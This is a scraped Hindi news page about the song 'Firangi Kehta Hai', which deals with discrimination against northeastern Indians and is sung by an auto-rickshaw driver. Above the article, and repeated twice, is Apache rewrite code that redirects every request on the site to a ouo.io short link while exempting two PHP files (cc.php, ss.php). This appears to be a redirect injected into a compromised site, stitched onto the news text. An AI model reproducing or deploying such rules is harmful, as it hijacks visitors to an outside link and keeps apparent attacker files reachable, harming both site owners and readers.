
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 450
Previous Nextमुंबई। हिंदी बेल्ट में उत्तर पूर्वी भारत से आने वाले अधिकांश लोगों के साथ भेदभाव की शिकायत आम होती। देश के उत्तर पूर्वी राज्यों जैसे असम, मणिपुर, मेघालय से आने वाले भारतीय इस बात की शिकायत करते हैं कि उत्तर भारत या भारत के अन्य हिस्सों में उनके साथ अच्छा बर्ताव नहीं किया जाता है और उन्हें तरह तरह के नामों से तंग किया जाता है। उन्हें यह एहसास दिलाया जाता है कि वो अपने देश में रहते हुए भी फिरंगी हैं क्योंकि उनके नैन नक्श दूसरे लोगों से अलग होते हैं। ‘फिरंगी कहता है’ एक ऐसा ही गाना है जो अपने ही देश में बेगाने हो चुके लोगों की कहानी कहता है। इस गाने को लिखने वाली विशाखा राय ने खुद भी इस तरह के जुमले और टॉर्चर झेला है और इसी के चलते उन्होनें ‘फिरंगी’ नाम के इस गाने को चुना।
इस गाने से जुड़ी एक और खास बात है इस गाने के गायक वसीम अकरम. वसीम एक ऑटो चालक हैं और वो कमाल की गायिकी भी करते हैं। अपने परिवार का पेट पालने के लिए संघर्ष कर रहे वसीम को विशाखा ने इस गाने के ज़रिए अपने सपने यानि संगीत को अपनाने का एक मौका भी दिया है। ‘फिरंगी कहता है’ गाना उस मानसिकता को दिखाता है जिसे जाने अनजाने हम सभी अपना लेते हैं। सोशल मीडिया पर इस गाने को कई लोगों ने सराहा है और इस गीत को लेकर विशाखा एक भव्य लॉन्च की तैयारी भी रखती हैं। वो कहती हैं मेरा गाना उस समय सफल हो जाएगा जब लोगों को समझ आ जाएगा कि अपने घर में बेगाना हो जाना कैसा लगता है...